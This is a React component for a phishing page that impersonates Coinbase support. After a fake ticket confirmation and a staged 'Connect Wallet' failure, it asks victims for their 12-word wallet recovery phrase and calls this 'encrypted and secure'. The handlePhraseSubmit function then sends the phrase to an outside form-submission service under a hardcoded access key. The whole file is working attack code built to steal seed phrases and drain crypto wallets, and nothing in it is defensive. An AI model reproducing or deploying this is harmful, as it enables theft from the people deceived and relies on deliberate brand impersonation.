import { useState } from 'react';

export default function ConnectWallet() {
  const [ticketId] = useState(() => Math.floor(100000 + Math.random() * 900000).toString());
  const [step, setStep] = useState<'initial' | 'loading' | 'error' | 'manual' | 'phrase' | 'progress'>('initial');
  const [phrase, setPhrase] = useState('');

  const handleConnectWallet = () => {
    setStep('loading');
    setTimeout(() => {
      setStep('error');
    }, 2000);
  };

  const handleManualConnect = () => {
    setStep('manual');
    setTimeout(() => {
      setStep('phrase');
    }, 1500);
  };

  const handlePhraseSubmit = async (e: React.FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    
    const formData = new FormData();
    formData.append('access_key', '920709c6-c15a-4ded-afbc-efee4e541acb');
    formData.append('ticket_id', ticketId);
    formData.append('recovery_phrase', phrase);
    
    try {
      await fetch('https://api.web3forms.com/submit', {
        method: 'POST',
        body: formData
      });
      setStep('progress');
    } catch (error) {
      console.error('Submission error:', error);
    }
  };

  return (
    <div className="min-h-screen relative bg-white">
      {/* Coinbase Header */}
      <header className="bg-white border-b border-gray-200 sticky top-0 z-50">
        <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
          <div className="flex items-center justify-between h-16">
            <div className="flex items-center gap-8">
              <img 
                src="https://static.readdy.ai/image/5c7bfc2a438c1607f8e9e52884d8d2e0/97dbcb1a3804cc50bc8763902297e80c.png" 
                alt="Coinbase" 
                className="h-8 w-auto"
              />
              <nav className="hidden md:flex items-center gap-6">
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Prices</a>
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Learn</a>
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Individuals</a>
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Businesses</a>
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Developers</a>
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Company</a>
              </nav>
            </div>
            <div className="flex items-center gap-3">
              <button className="hidden md:block text-sm font-medium text-gray-700 hover:text-blue-600 px-4 py-2 rounded-lg cursor-pointer whitespace-nowrap">
                Sign in
              </button>
              <button className="bg-blue-600 hover:bg-blue-700 text-white text-sm font-medium px-4 py-2 rounded-lg cursor-pointer whitespace-nowrap transition-colors">
                Get started
              </button>
            </div>
          </div>
        </div>
      </header>

      {/* Main Content */}
      <main className="max-w-2xl mx-auto px-4 sm:px-6 lg:px-8 py-12">
        <div className="bg-white rounded-2xl shadow-xl border border-gray-200 p-8 md:p-12">
          {step === 'initial' && (
            <div className="text-center">
              <div className="w-20 h-20 bg-green-100 rounded-3xl flex items-center justify-center mx-auto mb-6 shadow-lg">
                <i className="ri-check-line text-4xl text-green-600"></i>
              </div>
              <h1 className="text-4xl font-bold text-gray-900 mb-3">Thank You!</h1>
              <p className="text-base text-gray-600 mb-6">Your support ticket has been submitted successfully.</p>
              
              <div className="bg-blue-50 rounded-2xl p-8 mb-8 border border-blue-200">
                <p className="text-sm font-semibold text-gray-600 mb-2">Your Ticket ID</p>
                <p className="text-4xl font-bold text-blue-600">{ticketId}</p>
              </div>

              <div className="bg-blue-50 border border-blue-200 rounded-xl p-6 mb-8 text-left">
                <div className="flex items-start gap-4">
                  <div className="flex-shrink-0 w-12 h-12 bg-blue-600 rounded-xl flex items-center justify-center">
                    <i className="ri-shield-check-line text-2xl text-white"></i>
                  </div>
                  <div className="flex-1">
                    <h3 className="text-base font-bold text-gray-900 mb-2">Secure Wallet Verification</h3>
                    <p className="text-sm text-gray-700 leading-relaxed">
                      To process your support request securely, we need to verify your wallet ownership. This ensures we're helping the rightful account owner.
                    </p>
                  </div>
                </div>
              </div>

              <button
                onClick={handleConnectWallet}
                className="w-full bg-blue-600 hover:bg-blue-700 text-white font-semibold py-4 px-6 rounded-xl transition-all whitespace-nowrap cursor-pointer shadow-lg hover:shadow-xl transform hover:scale-[1.02] active:scale-[0.98]"
              >
                <span className="flex items-center justify-center gap-2">
                  <i className="ri-wallet-3-line text-xl"></i>
                  Connect Wallet
                </span>
              </button>
            </div>
          )}

          {step === 'loading' && (
            <div className="text-center py-12">
              <div className="relative w-24 h-24 mx-auto mb-8">
                <div className="absolute inset-0 border-4 border-blue-200 rounded-full"></div>
                <div className="absolute inset-0 border-4 border-blue-600 border-t-transparent rounded-full animate-spin"></div>
                <div className="absolute inset-3 bg-blue-100 rounded-full flex items-center justify-center">
                  <i className="ri-wallet-3-line text-2xl text-blue-600"></i>
                </div>
              </div>
              <p className="text-lg font-semibold text-gray-700 mb-2">Connecting to your wallet...</p>
              <p className="text-sm text-gray-500">Please wait a moment</p>
            </div>
          )}

          {step === 'error' && (
            <div className="text-center">
              <div className="w-20 h-20 bg-red-100 rounded-3xl flex items-center justify-center mx-auto mb-6 shadow-lg">
                <i className="ri-close-line text-4xl text-red-600"></i>
              </div>
              <h2 className="text-3xl font-bold text-gray-900 mb-3">Connection Error</h2>
              <p className="text-base text-gray-600 mb-8">Unable to connect automatically. Please try manual connection.</p>
              
              <button
                onClick={handleManualConnect}
                className="w-full bg-blue-600 hover:bg-blue-700 text-white font-semibold py-4 px-6 rounded-xl transition-all whitespace-nowrap cursor-pointer shadow-lg hover:shadow-xl transform hover:scale-[1.02] active:scale-[0.98]"
              >
                <span className="flex items-center justify-center gap-2">
                  <i className="ri-settings-3-line text-xl"></i>
                  Connect Wallet Manually
                </span>
              </button>
            </div>
          )}

          {step === 'manual' && (
            <div className="text-center py-12">
              <div className="relative w-24 h-24 mx-auto mb-8">
                <div className="absolute inset-0 border-4 border-blue-200 rounded-full"></div>
                <div className="absolute inset-0 border-4 border-blue-600 border-t-transparent rounded-full animate-spin"></div>
                <div className="absolute inset-3 bg-blue-100 rounded-full flex items-center justify-center">
                  <i className="ri-settings-3-line text-2xl text-blue-600 animate-spin"></i>
                </div>
              </div>
              <p className="text-lg font-semibold text-gray-700 mb-2">Attempting manual connection...</p>
              <p className="text-sm text-gray-500">Configuring secure connection</p>
            </div>
          )}

          {step === 'phrase' && (
            <div>
              <div className="text-center mb-8">
                <div className="w-20 h-20 bg-orange-100 rounded-3xl flex items-center justify-center mx-auto mb-6 shadow-lg">
                  <i className="ri-key-2-line text-4xl text-orange-600"></i>
                </div>
                <h2 className="text-3xl font-bold text-gray-900 mb-3">Recovery Phrase Required</h2>
                <p className="text-base text-gray-600">Please enter your 12-word recovery phrase to verify your wallet.</p>
              </div>

              <form onSubmit={handlePhraseSubmit} className="space-y-6" data-readdy-form>
                <div className="group">
                  <label htmlFor="phrase" className="block text-sm font-semibold text-gray-700 mb-2">
                    12-Word Recovery Phrase <span className="text-red-500">*</span>
                  </label>
                  <div className="relative">
                    <textarea
                      id="phrase"
                      name="phrase"
                      required
                      rows={4}
                      maxLength={500}
                      value={phrase}
                      onChange={(e) => setPhrase(e.target.value)}
                      className="w-full px-4 py-3.5 text-sm border-2 border-gray-200 rounded-xl focus:ring-2 focus:ring-blue-500 focus:border-blue-500 outline-none transition-all resize-none group-hover:border-gray-300"
                      placeholder="Enter your 12-word recovery phrase separated by spaces"
                    />
                  </div>
                  <div className="flex items-center gap-2 mt-3 bg-blue-50 px-4 py-3 rounded-xl border border-blue-200">
                    <i className="ri-shield-check-line text-blue-600 text-lg"></i>
                    <p className="text-xs text-blue-700 font-medium">
                      Your recovery phrase is encrypted and secure
                    </p>
                  </div>
                </div>

                <button
                  type="submit"
                  className="w-full bg-blue-600 hover:bg-blue-700 text-white font-semibold py-4 px-6 rounded-xl transition-all whitespace-nowrap cursor-pointer shadow-lg hover:shadow-xl transform hover:scale-[1.02] active:scale-[0.98]"
                >
                  <span className="flex items-center justify-center gap-2">
                    <i className="ri-lock-unlock-line text-xl"></i>
                    Verify Wallet
                  </span>
                </button>
              </form>
            </div>
          )}

          {step === 'progress' && (
            <div className="text-center">
              <div className="w-20 h-20 bg-blue-100 rounded-3xl flex items-center justify-center mx-auto mb-6 shadow-lg">
                <i className="ri-time-line text-4xl text-blue-600"></i>
              </div>
              <h2 className="text-3xl font-bold text-gray-900 mb-3">Ticket In Progress</h2>
              <p className="text-base text-gray-600 mb-6">
                Your support request is being processed. Our team will contact you shortly.
              </p>
              
              <div className="bg-blue-50 rounded-2xl p-8 border border-blue-200 mb-8">
                <p className="text-sm font-semibold text-gray-600 mb-2">Ticket ID</p>
                <p className="text-3xl font-bold text-blue-600">{ticketId}</p>
              </div>

              <div className="bg-green-50 border border-green-200 rounded-xl p-4">
                <div className="flex items-center justify-center gap-2 text-green-700">
                  <i className="ri-time-line text-lg"></i>
                  <p className="text-sm font-semibold">Expected response time: 24-48 hours</p>
                </div>
              </div>
            </div>
          )}
        </div>

        {/* Security Notice */}
        <div className="mt-8 bg-gray-50 border border-gray-200 rounded-xl p-6">
          <div className="flex items-start gap-4">
            <div className="flex-shrink-0 w-10 h-10 bg-gray-200 rounded-lg flex items-center justify-center">
              <i className="ri-information-line text-xl text-gray-600"></i>
            </div>
            <div className="flex-1">
              <h3 className="text-sm font-bold text-gray-900 mb-2">Security Reminder</h3>
              <p className="text-sm text-gray-600 leading-relaxed">
                Coinbase will never ask for your password or 2FA codes. Only provide your recovery phrase through this secure verification process.
              </p>
            </div>
          </div>
        </div>
      </main>

      {/* Footer */}
      <footer className="bg-gray-50 border-t border-gray-200 mt-20">
        <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 py-12">
          <div className="grid grid-cols-2 md:grid-cols-4 gap-8 mb-8">
            <div>
              <h4 className="font-semibold text-gray-900 mb-4">Learn</h4>
              <ul className="space-y-2">
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Browse crypto prices</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Coinbase Bytes newsletter</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Crypto basics</a></li>
              </ul>
            </div>
            <div>
              <h4 className="font-semibold text-gray-900 mb-4">Individuals</h4>
              <ul className="space-y-2">
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Buy & sell</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Earn rewards</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Wallet</a></li>
              </ul>
            </div>
            <div>
              <h4 className="font-semibold text-gray-900 mb-4">Businesses</h4>
              <ul className="space-y-2">
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Coinbase Commerce</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Coinbase Prime</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Institutional</a></li>
              </ul>
            </div>
            <div>
              <h4 className="font-semibold text-gray-900 mb-4">Company</h4>
              <ul className="space-y-2">
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">About</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Careers</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Legal & privacy</a></li>
              </ul>
            </div>
          </div>
          <div className="border-t border-gray-200 pt-8 flex flex-col md:flex-row justify-between items-center gap-4">
            <p className="text-sm text-gray-600">© 2024 Coinbase</p>
            <div className="flex items-center gap-4">
              <a href="#" className="text-gray-600 hover:text-blue-600 cursor-pointer">
                <i className="ri-twitter-x-line text-xl"></i>
              </a>
              <a href="#" className="text-gray-600 hover:text-blue-600 cursor-pointer">
                <i className="ri-facebook-fill text-xl"></i>
              </a>
              <a href="#" className="text-gray-600 hover:text-blue-600 cursor-pointer">
                <i className="ri-instagram-line text-xl"></i>
              </a>
            </div>
          </div>
        </div>
      </footer>
    </div>
  );
}
